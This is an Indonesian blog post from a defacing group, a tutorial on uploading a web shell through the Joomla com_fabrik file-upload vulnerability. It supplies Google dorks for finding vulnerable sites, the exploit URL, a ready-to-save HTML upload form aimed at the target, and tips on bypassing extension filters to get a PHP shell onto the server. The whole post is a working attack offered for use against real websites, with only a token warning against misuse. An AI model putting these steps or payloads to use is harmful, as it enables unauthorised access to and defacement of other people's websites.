Breaking

Kamis, 14 Desember 2017

Home / Deface / Cara Deface Dengan Com_Fabrik Upload Shell Vulnerability

Cara Deface Dengan Com_Fabrik Upload Shell Vulnerability

by on in
Hallo Guys >,< Dahh Lama Nga Post :v >,< Kali ini Saya Akan Post Tutorial Cara Deface Dengan Com_Fabrik Upload Shell Vulnerabilitiy Sebelumnya Com_Fabrik Upload CSV saja :v ini kemungkikan Rengkarnasinya :v dahh ahh capek ngmonk ga jelas :v lanjut aja tutornya biar jelas :D
~
Dork : inurl:index.php?option=com_fabrik
           inurl:index.php?option=com_fabrik site:com

Exploit : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Vulnerability : {"filepath":null,"uri":null} CSRF = <form method="POST" action="http://target.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
enctype="multipart/form-data">
<input type="file" name="file" /><button>Upload</button>
</form>

 Your Access Shell: /patch/file.php

1. Masukkan Dorknya Ke Google >,< Tinggal Carii web yang mau di Eksekusi ;v >,<


Jika Sudah Dapat Targetnya Eksekusinya Tinggal Lanjut Tahap Selanjutnya >,< btw saya Pkek Web Target :v >,< Biar Mempermudah Ilmu Yang Di Cerna :v 



Disini Kita Tinggal Tambahkan Exploitnya Di Belakang Website Target Yang Kita Mau Eksekusi :v   www.site.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload 




 Jika Sudah Tampilan Seperti Di Atas :V Skalian Tanda Vulnerability Pada Websitenya :v Kalau Sudah Tinggal Masukkan URL nya Ke CSRF Nya Sadjah Buat Upload Shell :v


Ambil Dan Copy CSRF Di Atas Simpan Dengan Format .html Lalu Masukkan URL Web Target Yang Sudah Di Kasih Exploit Ke Dalam CSRF tadi Kalau Sudah Akan Muncul Nanti Tempat Upload Shellnya 





Nahhh Saya Kali ini Upload HTML aja karna ngag bsa Upload PHP :v >,< hanya buat tutor aja :D kalau Sudah Di Upload Akan Muncul Seperti ini Jadi Tinggal Manggil Access File Saja 

NB : Ingat Ngag Semua Website Bisa Di Upload Shell Kadang Ada Yang Hanya Menerima .jpg .txt .html .htm .doc dll  ;) Kalau Mau Maksa Bisa Upload Shell Pande"lahh Bypass Ext nya :v 





Cara Panggil Access File nya 

www.site.com/filename.html / php Tergantung siihh Uploadnya apaan :v

Gimana ? Susah ? Mudah Kok :D Yang Susah Ngelakuinnya :D Ngag ada Niat :D Cba Anak Niat Pasti Semua Akan Mudah :) ...

NB : Jangan Lupa Comment Kalau Kurang Tau , Like , Share yahh, Ilmu Jangan Di Pendemin Kalau Bisa Bermanfaat Buat Orang Lain :) Kenapa Tidak Di Keluarkan :v Jangan Salah Gunakan Yahh ^-^

Salam Hangat : DeathCreppy From Jones Unlimited Edition
Author Image

About Unknown
We Are Jones Unlimite Edition | We Can Succeed If We Learn From Mistakes

Related Posts:
By di
Label:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)
Adbox